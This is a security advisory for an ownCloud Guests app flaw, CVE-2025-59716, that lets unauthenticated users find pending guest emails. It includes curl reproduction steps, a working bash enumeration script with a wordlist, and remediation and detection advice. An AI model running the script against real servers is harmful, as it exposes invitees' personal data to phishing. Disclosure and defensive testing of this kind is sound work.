Type: Information Disclosure (User Enumeration)
CWE: CWE-200 (Exposure of Sensitive Information) / CWE-203 (Observable Discrepancy)
Affected component: ownCloud Guests app
Tested on: ownCloud Server 10.11, Guests app v0.12.4, Apache HTTPD
Researcher: Ali Firas (@thesmartshadow)
Date: 2025-11-03
An unauthenticated user can enumerate pending guest accounts by probing the registration endpoint and observing response differences when the email exists as a pending guest vs. when it does not. This leaks valid email addresses (PII), enabling targeted phishing/social engineering against legitimate invitees.
/apps/guests/register/{email}/{token}
The presence of a valid pending guest for {email} changes the server response even if the provided {token} is fake.
Affected Endpoint: /apps/guests/register/{email}/{token}
Code Path: apps/guests/lib/Controller/RegisterController.php::showPasswordForm()
Tested Versions: ownCloud Server 10.11 + Guests app 0.12.4
- ownCloud Server: 10.11
- Guests app: 0.12.4
- Web server: Apache
curl -i "http://<target>/apps/guests/register/nonexistent-user@example.com/123"Expected/Observed: HTML response contains the string:
No such guest user
As an ownCloud admin, share any file/folder with test-guest@example.com.
This creates a pending guest entry with a registration token in the database.
curl -i "http://<target>/apps/guests/register/test-guest@example.com/123"Observed:
- The password registration form is rendered.
- The page does not include the “No such guest user” error.
This discrepancy reveals that test-guest@example.com exists as a pending guest.
Provide a wordlist of candidate emails; the script flags addresses that resolve to a pending guest.
#!/usr/bin/env bash
# CVE-2025-59716 PoC enumerator
TARGET="http://<target>"
WORDLIST="emails.txt"
while IFS= read -r EMAIL; do
RESP=$(curl -sS "$TARGET/apps/guests/register/$EMAIL/123")
if echo "$RESP" | grep -q "No such guest user"; then
echo "[-] $EMAIL -> not found"
elif echo "$RESP" | grep -qi "password" && echo "$RESP" | grep -qi "register"; then
echo "[+] $EMAIL -> PENDING GUEST (leak)"
else
echo "[?] $EMAIL -> ambiguous response"
fi
done < "$WORDLIST"Notes: Adjust the two
grepheuristics to match the exact templates/locale deployed by your target.
- PII leakage: discloses whether a given email is a valid pending guest.
- Enables spear‑phishing: attackers can target real invitees with convincing lures referencing the ongoing registration.
- Amplifies password attacks: knowledge of valid identities reduces guess space and can assist credential‑stuffing across ecosystems.
- CVSS v3.1 (example): AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N → Base 5.3 (Medium)
Adjust per your environment and disclosure policy.
Rendering logic for the /apps/guests/register/{email}/{token} route diverges before token validation short‑circuits the flow, producing an observable difference when {email} maps to a pending guest.
- Uniform responses: return the same generic template/message regardless of whether
{email}exists or is pending. - Verify token first: fail fast on invalid/expired tokens before any email‑existence–dependent branching.
- Rate limiting & logging: throttle repeated probes and surface signals for detection.
- Optional: CAPTCHA/secondary checks on anonymous registration views.
- Web logs with a high rate of
GET /apps/guests/register/*/*for diverse emails and a constant fake token. - User‑agent/IP patterns indicative of scripted enumeration.
- Template rendering metrics showing disproportionate hits to the registration page with invalid tokens.
- Reporter: Ali Firas (@thesmartshadow)
- CVE: CVE-2025-59716
- Classification: CWE-200, CWE-203
Disclaimer: This PoC is provided for defensive testing on systems you own or are authorized to assess.